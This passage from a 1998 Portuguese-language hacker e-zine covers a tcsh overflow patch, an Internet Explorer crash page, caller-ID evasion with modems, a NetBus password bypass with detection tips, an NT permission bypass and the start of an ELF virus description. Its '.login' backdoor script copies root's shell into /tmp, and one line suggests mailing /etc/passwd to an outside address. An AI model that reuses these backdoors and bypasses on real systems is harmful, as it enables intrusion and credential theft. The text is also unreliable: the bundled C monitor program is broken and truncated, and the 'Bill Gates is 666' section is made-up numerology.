apollo */ - (void) strcpy(ebuf, short2str(cp)); + (void) strncpy(ebuf, short2str(cp), MAXPATHLEN); + ebuf[MAXPATHLEN-1]=0; @@ -1061,7 +1062,7 @@ #endif /* apollo */ continue; /* canonicalize the link */ } -#endif /* S_IFLNK */ +#endif /* S_IFLNKXYZ */ if (slash) *p = '/'; } @@ -1096,7 +1097,8 @@ /* * Start comparing dev & ino backwards */ - p2 = Strcpy(link, cp); + p2 = Strncpy(link, cp, MAXPATHLEN); + link[MAXPATHLEN-1]=0; found = 0; while (*p2 && stat(short2str(p2), &statbuf) != -1) { if (DEV_DEV_COMPARE(statbuf.st_dev, home_dev) && @@ -1119,7 +1121,7 @@ cp = newcp; } } -#endif /* S_IFLNK */ +#endif /* S_IFLNKXYZ */ #ifdef apollo if (slashslash) { @@ -1255,7 +1257,9 @@ return (0); } } - (void) Strcpy(s, dp->di_name); + + (void) Strncpy(s, dp->di_name, MAXPATHLEN); + s[MAXPATHLEN-1]=0; return (1); } --- codigo por: MiG. texto por: bloodar00tou. /bin/bash buffer overflow. by - reg (c) blood@puruca.com.br ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³5 - Microsoft Internet Exploder BUG!!! boguzes ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot ³°° ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° IE explorer did it again ;) !!! Eu acho impressionante como ele, ICQ e sendmail conseguem ter tantos bugs... Bom, melhor para todos nos. O internet explorer, tem um html tag chamado , este se usado de forma maliciosa (woowhow!!!) pode crashar o Internet Explorer 4.0 sob a queridissima janela de todos os santos bugs ;), O abaixo, e como o bug funciona, veja: Abrindo uma caixa de dialogo do IE dizendo a comum frase do rat0es por ai: "IEXPLORE: ...illegal operation" e entao o ato final acontece, o IE fecha. ou entao a famosa tela azul do windows e entao voce precisa rebootar a sua maquina. Bom, veja um exemplo do bug: -- iecrashobject.html -- Crashando o IE 4.0, para um mundo melhor. -- iecrashobject.html -- Coloque isto na sua pagina (index.html) e so espere para ver os carinhas entrando e saindo mais rapido que a mae deles do maoso leu dos muitos pais que o garoto tem. ;) MSIE bug!!! Abrindo bill gaytes OpenWide!!! by bloodroot|bi0t3k. blood@deathknights.com ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³6 - Bill Gates e a besta (666), veja a verdade sobre a besta ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by beltra ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° "Recentemente, segundo os nossos estudos, nos descobrimos o que" "temiamos... Bill Gates é a besta, veja o relatorio completo" - Linus Torto. --.-- Se voce usa produtos Microsoft, deve saber destes fatos... Voce sabia que o verdadeiro nome de Bill Gates e Willian Henry Gates III? Bom, o que ha de aterrorizante neste nome? Se você pegar todas as letras do nome Bill Gates III, e transforma-lo no codigo ASCII (American Standard Code for Information Interchange) equivalente, somando os numeros, obtera o número 666, que e o numero da Besta! B = 66 I = 73 L = 76 L = 76 G = 71 A = 65 T = 84 E = 69 S = 83 I = 1 I = 1 I = 1 ----- 666 Coincidencia? Talvez, porem pegue Windows95 e faz o mesmo, voce obtera 666! E o mesmo vale para MS-DOS 6.22! Ainda acha coincidencia? MS-DOS 6.22 -> 77+83+45+68+79+83+32+54+46+50+49 = 666 Windows 95 -> 87+73+78+68+79+87+83+57+53+1 = 666 .Agora vem o melhor! Se voce tiver o "Excel 95" (nao e o Excel do Office97), faca esta prova: Abra um arquivo novo; Posicione-se na linha 95 Clique o botao 95, assim a linha inteira ficara selecionada; Pressione , para ir para a segunda coluna; Selecione o menu "Ajuda (?)" e em seguida "Sobre o Microsoft Excel..."; Pressione ctrl + alt + shift e (mantendo-as pressionadas), selecione a opção "Suporte tecnico" na janela de ajuda. Ira aparecer uma janela, com o titulo: THE HALL OF TORTURED SOULS. Isto realmente e aterrorizante! E um jogo similar ao Doom, e voce pode percorre-lo com os setas de direcao. Nas paredes aparecem os nomes, em movimento, das "almas torturadas"... Agora va ate as escadas que aparecem e volte em direcao a parede que estava as suas costas ao começar o jogo. E branca e quadriculada... Tecle EXCELKFA. A parede se abre e revela uma passagem secreta. Entrando nela, você ira andar num caminho elevado (tente nao cair, o que é muito dificil). Quando você chegar ao final vera algo REALMENTE aterrorizante! Poderia ser uma brincadeira dos programadores da Microsoft ou não? Realmente, nao seria surpreendente que Bill Gates fosse o "Anti-cristo", alem do que, ja disse a Biblia que "...alguem poderoso vira e guiara o mundo a destruicao...". E Bill Gates sem duvida tem esse tipo de poder nas suas maos. Mais de 80% dos computadores do mundo tem Windows e DOS (inclusive os do Pentagono!). Se todos esses produtos tiverem algum tipo de pequeno programa camuflado (como este "Hall of Tortured Souls") isto pode dar-lhe o controle de configurar os arsenais nucleares, fazendo estragos nos sistemas de segurança, e nos sistemas financeiros do mundo etc... Tudo isso pode ser feito apartir da sua sede e nao esta longe da realidade! Somente usando o Internet Explorer eles podem espiar o que temos no computador bit a bit cada vez que nos conectamos. Talvez o fim do mundo esteja proximo e isto seja somente a ponta do iceberg... Citacao da Biblia: "... e ele obrigou a todos, pequenos e grandes, ricos e pobres, livres e escravos, a receber uma marca em sua mao direita ou em seu rosto, de tal forma que ninguem poderia comprar ou vender sem a marca, que e o nome da Besta ou o numero do seu nome. (...) este número e 666." Apocalipse 13:16-18 Isto e algo em que se deve pensar... porque, se na Biblia, no livro do Apocalipse diz que sem o sinal da besta ninguem poderia ser capaz de comprar, vender, fazer transações comerciais etc... então, minha pergunta e: a Internet hoje em dia nao e uma necessidade para se fazer negocios? Note que a Internet tambem e conhecida como a World Wild Web ou WWW... Outra forma que podemos escrever W e V/ (VI), assim: W W W = VI VI VI = 666 Isto da o que pensar... Nao esta tudo encaminhando-se para a Internet? Comprar/vender bens, transações comerciais... E a Microsoft não está sempre tentando ter o monopólio da tecnologia dos softwares que produz, e agora principalmente, da Internet??? O Apocalipse também diz que "...a marca da Besta estará na mão e no rosto de cada um...". Se a Internet fosse em realidade o sinal da Besta, não estamos começando a levá-lo nas nossas maos (usando o mouse) e em nossos rostos (monitor)? Finalmente, tudo se encaixa (ou tudo é apenas fruto da nossa imaginação?)... Lembre-se, o demônio vem para enganar, roubar e destruir... assim, fique atento com respeito a Bill Gates e a Microsoft. "Estar ou não estar de acordo com a WWW ou a Besta", essa não é a questão. E se WWW é o 666? Ou Bill Gates é a Besta?? O que vamos fazer??? Cancelar nossa conexão com a Internet? Não utilizar mais os produtos da Microsoft? Formatar os micros com Windows95 pra sempre? AAAHHHHHHH!!! Isto não te faria nenhum bem, nem teria resultado algum contra o homem mais rico do mundo! Apenas releia este texto com atenção... e tire suas próprias conclusões... Lembre-se, "o fim está próximo!" Nunca deixe de crer... The truth is out there... bill é a besta (c) 1998. productions by "beltra" o bill é a besta, (c). ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³7 - Anti-bina systems, hackeando sistemas telefonicos digitais ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot ³°° ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° Recentemente, rio de janeiro, Sao Paulo, Belo horizonte, Rio grande do sul e outros estados do brasil , ja estao no minimo 70% digital , o que torna possivel algumas tecnicas 31337 no seu modem... Como por exemplo enganar binas, de qualquer marca que voce quiser, eu testei em algumas BBSs, mas em servidores eu nunca precisei usar, entao facam o teste a vontade. ;) Este e' um simples projeto para um esquema de bloquear o seu telefone, uma vez que voce ligue para um lugar que tenha bina. ;) [ funcionamento ] --------------------------------------------------------- Bom, basicamente e um pedaco de hardware, que quando voce construir tudo saira algo bem feio, mas bastante util. Um exemplo do que ira acontecer: ATZ OK ATDT2345678 - ligando para o numero 2345678 Neste mesmo momento, voce deve ter um outro terminal no seu computador, preparado com outra linha (linha 2). Entao voce faz a mesma coisa no seu segundo terminal. ATZ OK ATDT2345679 - ligando para o numero 2345679 CONNECT 2400 - especifica BAUD/rate Considerando que, o numero que tenha bina e': 2345678, e o seu telefone de casa e': 542-2342, assim que voce ligar para 2345678, o telefone 2345678, que tem um bina instalado ira catar o seu telefone verdadeiro, mas se voce estiver usando este sistema aqui, ele ira catar o seu telefone verdadeiro, o que ABS faz e', na hora que voce ligar pelo ABS, o bina so ira pegar o segundo telefone de um numero qualquer que voce especificou antes. Assim, no bina ira aparecer: "Ligacao originada do no.: 564.5463" Que nao e' o seu numero verdadeiro. ;) Acho que ficou meio dificil de entender mais. Os usos para este tipo de hardware sao imensos, considerando que somente um telefone com um sofisticado e novo sistema de filtro, poderia realmente catar o verdadeiro numero do telefone, mesmo assim seria necessario estu- dar a fundo o sistema do ABS. [ hardware ] ------------------------------------------------------------- Bom, o que voce vai precisar para construir esta bagaca: - 2 modems externos (e necessario que todos os dois sejam externos) - 2 linhas telefonicas (nesta mesma edicao da zine eu ensino como puxar uma linha direto para a sua casa) - 1 cabo de modem (null) - Os cabos de telefones e soquetes apropriados. E' necessario que todas os modems permitam conexoes no modo DUMB (burro???), para que nenhum modo qualquer de outros tipos de ter minais possam atrapalhas o trabalho. Voce tambem usara o modo SMART de terminal. [ setupando ] ------------------------------------------------------------ 1. Ponha um dos terminais em modo DUMB, e o outro em modo SMART. 2. Configure o terminal SMART em modo auto-antender pelo modem. Geralmente o comando e': ATS0=1&W. 3. Plug o cabo do modem nos dois modens, fazendo um conexao. 4. Conecte a linha que sera usada como isca (a linha falsa) em modo DUMB. 5. Conecte a linha verdadeira em modo SMART. 6. Ligue os modems. 7. Teste o ABs, ligando para a sua estacao (prefixo do seu numero) e peca para que eles identifiquem o numero que esta ligando. [ conectando ] ----------------------------------------------------------- Va no seu programa de conexao (telnet.exe? sux!!!). Entao, agora pegue o seu terminal DUMB e ligue para o seu terminal SMART, como voce o configurou como auto-answer, entao voce automaticamente agora, estara se conectando a outra linha digital. Voce facar algo assim: ATZ OK ATDT4324242 - Linha do modem na configuracao SMART, que sera detectada pelo bina. CONNECT 2400. Agora, voce ja esta conectado no modem 2 (smart), entao agora e' so fazer isto: AT OK ATDT2345678 - Linha com bina.... Que nao pegara o seu telefone verdadeiro. [ finalle ] -------------------------------------------------------------- Agora, que o modem ja nao pega mais a sua linha, e' estupidamente simples voce fazer qualquer merda ;) Para se desconectar e' so apertar '+++', e do resto e' relaxar e brincar com o ABS. thanx to: digital|darkcore|dert ABS - Anti-bina Systems blood@deathknights.com ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³8 - netbus sekurity advisory ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot ³°° ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° .[The Phone9 Communications Systems (c) 1997-1998 productions]. .[Sekurity advisory]. .[27/09/98 - P9]. .[netbus advisory - by The bloodroot]. Contents: ''''''''' 01: Sumario 02: Vulnerabilidade 03: Comprometimento 04: Detectando e removendo o netbus **: Removendo a senha do netbus via telnet - by Phineas Phreak 01: Sumario Pouco tempo depois do lancamento do conhecido programa Back Orifice da cDc, uma geracao de programas baseados no codigo do BO, ou nao relacao cliente servidor que o BO e o Back Office implementam no windows95/98. O que e' algo bem forte no netbus e a possibilidade dele ser usado em siste mas No Trust(NT), diferenciando-se do Back Orifice, que somente afetas win- dows95 e 98. Utilizando-se do protocolo TCP, permite conexoes remotas por meio de telnet ou do cliente, embora no telnet os comandos sejam um tanto estranhos e as interpretacoes dos comandos sao bem estranhas, a melhor maneira de se usar o Netbus, e' simplesmente usando o seu cliente, que permite que funcoes se- jam feitas em uma interface mais amigavel... :) Por estas pequenas mais maldosas e habilidosas mudancas, o netbus esta to- mando o lugar do Back Orifice, embora seja um tanto mais seguro e sem possi veis virus e backdoors dentro do programa, o netbus sera o no BO??? 02: Vulnerabilidade Assim como o Back Orifice, o Netbus nao apresenta nenhuma vulnerabilidade e na verdade e' uma ferramenta mais seria que o BO, permitindo a remocao da backdoor pelo proprio programa, embora assim continua sem apresentar vulne- rabilidade, nao existe porque sentir medo de uma outra nova arma que o net- bus usa. 03: Comprometimento O netbus se destaca do BO, por algumas caracteristicas especificas sobre a sua soberania sobre o servidor, mais funcoes podem ser exercidas no siste ma, e ainda e' auto-instalava, como o Back Orifice, entao em uma unica exe- cucao, voce ja esta vulneravel... As funcoes que o netbus tem a mais que o BO, sao: - Pode rebootar o servidor - Pode desconectar usuarios da rede - Permite enviar comandos ou caracteres para aplicativos ativos - Nao aparece na lista de tarefas do windows E ainda por cima, o netbus usa-se de uma senha para permitir acesso ao seu servidor, a senha nao e' muito incomum, semelhante a string abaixo: Password:0:my_password Porem ou backdoor ou apenas falha de programacao, o programa possui uma fa- lha que permite a conexao de um cliente remoto sem que este tenha a senha do servidor, bastando mudar a string do password de '0' para '1'. :) 04: Detectando e removendo o netbus O netbus era enviado para usuarios da internet como um patche.exe para mui- tos bugs no windowsNT e 95, embora este nome possa ser facilmente mudado, o netbus ainda sim representa a inseguranca, em qualquer nome... Netbus utiliza como padrao conexoes TCP, que podem ser fistas facilmente com um simples netstat, e ele se instala nas portas 12345, ou 12346 tanto Para detectar o netbus no seu sistema a primeira coisa para se fazer e' exe cutar este comando abaixo: c:\> netstat -an | find "1234" Caso voce tenha algum retorno, entao existe uma forte possibilidade que o sistema ja estaja vulneravel ao cliente do netbus. Tambem se e' possivel ver a atividade do netbus pelo telnet... Com o comando: c:\> telnet 127.0.0.1 12345 ou c:\> telnet 127.0.0.1 12346 Caso o netbus estiver instalado no seu sistema, entao voce vera na tela do telnet o seguinte: NetBus 1.63 ou NetBus 1.60 Alem disto, o programa tambem deixar marcas no sistema de execucao do win- dows, mais especificamente no registro do sistema, use o programa regedit para vasculhar o registro pelos seguintes rastros: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run[Nome do NetBus] HKEY_CURRENT_USER\Patch\Settings\ServerPwd A primeira chave indica que o netbus e' executado no boot do windows e a segunda indica o password que em texto puro, pode ser visto por qualquer um o que tira a fe de certas pessoas quanto a qualidade do Netbus :) Para remover o netbus, eu recomendo o programa feito por uma tal de General Tech, que foi mostrado no Jornal O Globo de 28/09/98, o programa (Backdoor Protection System v1.0) e' o primeiro programa que remove back orifice e netbus em um unico programa... Caso voce nao ache o programa, voce pode baixa-lo nos seguintes enderecos: -- http://www.phone9.org/labs/tools/bps.exe http://www.oglobo.com.br/bsp.exe http://www.puruca.com.br/bps.exe -- [obs. O programa tem 3kbytes mesmo.] Fora este programa, voce tem varias opcoes de desinstalar o netbus do seu sistema, pelo proprio servidor ou cliente... Veja: c:\>nome_do_servidor_do_netbus.exe /remove Isto ira remover o servidor... 2) Utilize o cliente do netbus para fazer essa desinstalacao, va na opcao "Server Admin" e depois "Remove Server". 3) A remocao do netbus pelo registro e' bem simples, apenas devera ir nas chaves abaixo e remover ou os valores ou entao o proprio registro, voce e' que escolhe :) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run[Nome do NetBus] HKEY_CURRENT_USER\Patch\Settings\ServerPwd Isto devera retirar totalmente o netbus do seu computador... **: Removendo a senha do netbus via telnet - by phineas phreak ... greets to: x-force team, paranoia, e Phineas Phreak. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³9 - Protegendo sua maquina contra loops ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by kasper ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ°° Em varios sistemas unix ou linuxzes um dos bugz mais chatos que existem concerteza sao aqueles de CPU time, que deixam a sua maquina lerda ao deixar a sua CPU em loop, ou seja, fazendo a mesma funcao repetidamente sem parar :) O programa abaixo monitora estas funcoes da CPU, e caso algumas delas estejam consumindo muita memoria, ou caso entrem em loop, esta sera ki- llada pelo programa. Todos os arquivos que serao monitorados sao os que sao mostrado pelo comando ps aux, e todos este serao passados para o ar quivo /etc/pstab, onde voce vera um log das suas atividades se estao usando muito da CPU ou se apenas estao nao taixa aceitavel :) O progra- ma tambem permite um sistema do qual voce seleciona certos arquivos que por propria natureza ocupma muito tempo na memoria, podem ser mudados e aceitados pelo programa. Bom, sem mais falas... Ai vai o codigo: --.[secure.c].-- /* keep your self secure * O programa sofreu muito pequenas alteracoes no codigo por bloodroot * mas o codigo basico e todo o credito deve ser dado para Kasper. * codigo por - Kasper */ #include #include #define CPULIMIT 90 #define MEMLIMIT 90 char *dontkill[]={"",""}; void parse_pstab(char pstab[]); void do_pstab(); int checkfontkill(char name[]); int checksize_for_dontkill(); void main() { if(fork() > 0) exit(0); do_pstab(); } void do_pstab() { char pstab[1024]; FILE *pst; our_loop : system(">/etc/pstab ps aux"); if(!(pst=fopen("/tmp/pstab","r"))) main(); while(!(feof(pst))) { fgets(pstab,sizeof(pstab),pst); parse_pstab(pstab); } sleep(1); fclose(pst) goto our_loop } void parse_pstab(char pstab[]) { char who[16]; char pid[8]; char cpu[8]; char mem[8]; char none[8]; char name[16]; sscanf(pstab,"%s %s %s %s %s %s %s %s %s %s %s",name,pid,cpu,mem if(check_dontkill(name)) kill(atoi(pid),9); } int check_dontkill(char name[]) { int i=0; while(1 < checksize_for_dontkill()) { if(check_dontkill(name)) i++; } return(1); } int checksize_for_dontkill() { int i=0; while(1) { if(dontkill[i]!=NULL) i++; else return i-1; --.[secure.c].-- Verifique a linha 79, para adcionar os programas que voce nao quer que seja killado pelo secure.c :) Estude-o, aprenda-o e depois telnet 127.0.0.1 19 :) ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³10 - Rompendo permissoes em sistemas NT ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄä¿ by bloodroot ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° Descricao: Ganhando acesso no sistema a locais onde voce nao possui acesso. Sistemas afetados: Windows NT (somente) Problema: O problema envolve o sistema NT e o sistema NTFS, explorando tal falhas, e possivel se ter acesso a qualquer lugar do servidor, por exemplo / . Vulnerabilidade: Digamos que o admin tenha setupado a sua rede para somente dar acesso ao User Management for Domains (usrmgr.exe) para membros do grupo do admin da rede, e deu acesso negado para qualquer outros usuarios, e grupos. Entao, tecnicamente voce nao teria acesso ao programa sem ser do grupo do admin, mas os tempos mudaram, e tambem o conceito de seguranca que um estupido c3 da microsoft exerce :) Entao digamos que o usuarios billgay tenha acesso acesso a pagina html blank.html. Entao ele pega o seu bugado IE e edita a pagina e coloca o seguinte: User (dumb) manager Ele salva o arquivo e depois cria um outro arquivo .html chamado de: acesso.htm, no acesso.htm voce tera o seguinte: Microsoft's nerds Page IBM's 31337 Homepage Hi, i'm a windows NT nerd, which makes me more nerd even :) acesso.htm E entao, o usuario salva o arquivo e logo depois pega o Internerd Exploder e vai na phone9.org, depois que a pagina estiver totalmente aberta, entao ele vai para o endereco: seuhost/seulogin/acesso.htm e quando a pagina co- mecar a abrir, voce aperta "back" ou "refresh" ou "stop", e derepente o usrmgr.exe o programa que voce nao tinha acesso nenhum ira aparecer na sua tela e voce tera acesso a este programa... O que acontece e' que quando vo ce, aperta back ou stop ou refresh ou reload, entao o Ie procura pela pagi na x:\winnt\system32\blank.htm e esta ao clicar no link ira executar o pro grama, e catab0wm, byebye seguranca do C3 winnt :) Mude o nome do programa no blank.html para executar outros... Obs: E' necessario ter um *.wav e um *.gif, pois estes irao confundir a ca- beca (ou cerebro se tiver algum) do IE, assim a execucao forcada do programa sera obtida por voce. Rompendo permissoes em windows NT [blood@phone9.org]|[blood@puruca.com.br]. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³11 - .login backdoor ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄä¿ by bloodroot ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° Okay, entao em sistema linux (nao sei se funciona em sistemas unix.) os arquivos .login, tem prioridade na leitura e execucao uma vez que uma pessoa se logue no sistema... E' possivel se instalar certos tipos de backdoors no sistema linux, uma vez que um rotao se loga no sistema, dentro do seu diretorio se existir tal aquivo .login, entao o conteudo executado dentro dele pode ser um tanto arbitrario para o sistema, ou seu usuarios, poden- do fazer com que varios tipos de backdoors sejam feitas no sistemas, por aterrorizante ratoes por ai. Lembramos que o poder de fogo desta backdoor pode ser devastador, uma vez que este sistema de backdoor seja implantado na raiz do sis- tema mais conhecida como '/'. Entao chega de tanta merda burocratica e tentando fazer a backdoor parecer como um advisory sobre uma possi vel falha, tentando imitar os unCERTs... :) O arquivo .login deve ficar dentro do diretorio do cara que sera ata cado, normalemente /root, ou entao /, lembrem-se disto :) Bom, examine esta chamada: /bin/cp /bin/sh /tmp/.login.shell Agora, uma vez que este codigo seja colocado dentro do .login, entao sera possivel copiar a shell do root ou do outros usuarios para den- tro do arquivo e assim podendo ser executado por qualquer vagabundo do sistema inteiro, comprometendo toda a seguranca imposta pelos merdz da cert. Agora examine o codigo completo da backdoor para que voce possa ver como ela funciona: --[.login]-- #!/bin/sh #smack this shit up!!! echo "Linux `uname -ar`" echo "No Mail" /bin/cp /bin/sh /tmp/.login.shell /bin/sh --[.login]-- Simples, hun? E' tao simples, mas mesmo assim para que o sistema rode perfeitamente, e' necessario trocar algumas coisinhas: [.inseguridade.] - Va no arquivo /etc/login.defs e desabilite as opcoes de Verificar em mail, e tambem a de expor a versao do sistema depois de logado. :) - Certifiquisse de que todos os componentes necessarios para a execucao dos comandos estejam existentes no sistema :) [.seguridade.] - Rode um ls que rode automaticamente em modo ls -a, vendo todo o conteu do diretorio, inclusive os arquivo com . na frente. - Depois retore a porra do programa, dug??? Agora, nos tambem ferificamos que o .login pode ser bem mais perigosa do que somente instalada dentro do diretorio de um misero usuario quando vc pode ter shells de todos??? Bom, entao o nosso alvo simplesmente e': Colocar o .login com o conteu- do abaixo, no diretorio.... /, que lugar mais simples do que onde tudo comecou :) --[.login #para / :)]-- #!/bin/sh echo "Linux `uname -ar`" echo "No Mail" whoami=`whoami` /bin/cp /bin/sh /tmp/.login.$whoami --[.login]-- Agora deixe-o rodando dentro do /, como .login que tudo ficara bem, ou- tra coisa importante a fazer e' destinar que todos os logins sejam ao in vez de direcionados para os seus proprios diretorios home, que sejam di- recionados para o diretorio / assim quando uma pessoa se logar ela auto- maticamente ela estara levando um .login backdoor na bunda, esta funcao pode ser mudada no /etc/logins.defs. O que estes tipos de backdoors representam o uso de ma fe de ferramentas que de inicio foram feitas para permitir o bem estar de varios usuarios que acessam o sistema, sendo como uma ferramenta tambem de seguranca, o que nao limita o poder de uso desta ferramenta para a seguranca,ja que o mesmo sentido de comandos que foram incluidos de forma insegura, e' pos- sivel que voces possam acrescentar comandos como, mail blood@p9.org /etc/ passwd :) Bom, pensem no assunto qualquer discussao sobre qualquer assun to do tipo, mail me: blood@phone9.org -- blood@puruca.com.br Obs. Nao e' purururururururururururururuca como muitos de voces acham que e' o nome e' feio, mas o cara e' humilde, de-em uma chance ele, desde que ele pegou cancer ele tem tido acoes estranhas com a sua mao direita e o seu olho, ooohhhhhhh... Da ate medo de pensar no que ele deve fazer com aquilo a noite. bloodroot, acidflush productions (c) - P h o n e 9 Communications Systems, Inc. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³12 - Eworn Project. ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by Dr.sm0g ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ°° _,----, ,---,___ ,-------,______________\ _|__\ __/ \___ ____// \\__ ___\__ ____|_ / \ \| _____/ _____// "Making terrorism throught / \ \ _| | \_ |_ "source code... :)" \____ _/\___/ \_ |_ _| _// - Dr.Sm0g & Taff membahs. `-----' \___/____/ \____| techno affliction [c] t e c h n o a f f l i c t i o n , inc. EWorm Project 28/09/98 Techno Affliction iNC. www.psynet.net/taff Copyright (c) 1998, by Dr.sm0g Made in Brazil. sm0g@psynet.net .iNTRODUCAO O EWorm eh um simples "virus" originalmente destinado - mas nao limitado - a infectar arquivos ELF. John V. (Antionline asshole) costuma dizer que atualmente, primeiro os duhdinhas invadem um sistema, alteram o site, para soh entao, pensar numa justificativa socio-politica para tal irresponsabi- lidade. Assim, digamos que o objetivo do EWorm seja o de realcar as neces- sidades de uma monitoracao constante do sistema, bem como o de suas respe ctivas permissoes :) Alem de apresentar ao leitor o funcionamento basico desse tipo de virus, iremos brevemente discutir os possiveis efeitos que um codigo bem escrito e disseminado poderia causar. Me esforcei ao maximo para evitar erros e equivocacoes (e tornar o texto o mais digestivel possivel), mas ainda considero isso longe do sufiente. Caso voce tenha algo a acrescentar, discutir, e principalmente corrigir, nao hesite em me contactar. Futuras atualizacoes desse projeto podem ser vistas no site da TAff, www.psynet.net/taff . ... .Elf Worm O EWorm usa como tecnica de infeccao um mecanismo que ja mostrou eficaz em diversos codigos, como por exemplo o virus VLPI da SVTA (que conseguiram complicar algo bem simples) o redirecionamento binario. Facil de implemen- tar, o redbin pode ser considerado quase que multi-operacional, podendo ser utilizado em *qualquer* OS que suporte tal redirecionamento. Como essa tecnica foge do objetivo desse texto recomendo - sem querer "puxar a lin- guica" pro meu lado, mas o txt ajuda bastante - que os interessados deem uma rapida olhada em: www.psynet.net/taff/files/b2.prj. Como nem tudo eh perfeito,o redbin nao pode ser considerado 100% confiavel Um dos poucos "probleminhas significativos" que merecem ser levantados, eh o fato de que *sob certas condicoes* o metodo pode ser notado em programas que utilizam o path para retornar algum erro em stdout como por exemplo no caso de /bin/ls. Ilustrando essa situacao, teriamos algo assim: - O virus redireciona seus binarios limpos para /tmp, e roda-os lah; No caso de um "ls" mal-sucedido, seria retornado o seguinte: #ls d* /tmp/ls: d* not found Dos varios metodos testados para corrigir isso um dos poucos que apresenta ram resultados significantes, usava certos acessos a memoria, que um usua- rio comum nao seria habilitado a fazer, ainda mais no caso do programa ser remotamente acessado (exemplo: /bin/login). Testei outros mecanismos de in feccao como por exemplo a de processos (feito tambem pela SVAT), mas alem de imenso o codigo nao eh nenhum pouco multi-OS. Por hora, eu ainda consi- dero o redbin algo bastante eficiente (..) Tendo em mente que antes de mais nada um virus deve ser pequeno, ao inves de elaborar todas as rotinas em C, e reinventar a roda (aumentando muito o tamanho do codigo), optei por "sujar" o virus com alguns system(), que me salvaram preciosos bytes. O virus tem um tamanho relativamente pequeno (que pode ser ainda menor, mas isso eh por conta do leitor), se visto os recursos utilizados. Nessa versao (publica) ocorre verificacao de arquivos (certifica-se que eh um ELF autentico, e ainda nao foi infectado); nao al- tera atime/mtime, e nem as permissoes do arquivo; 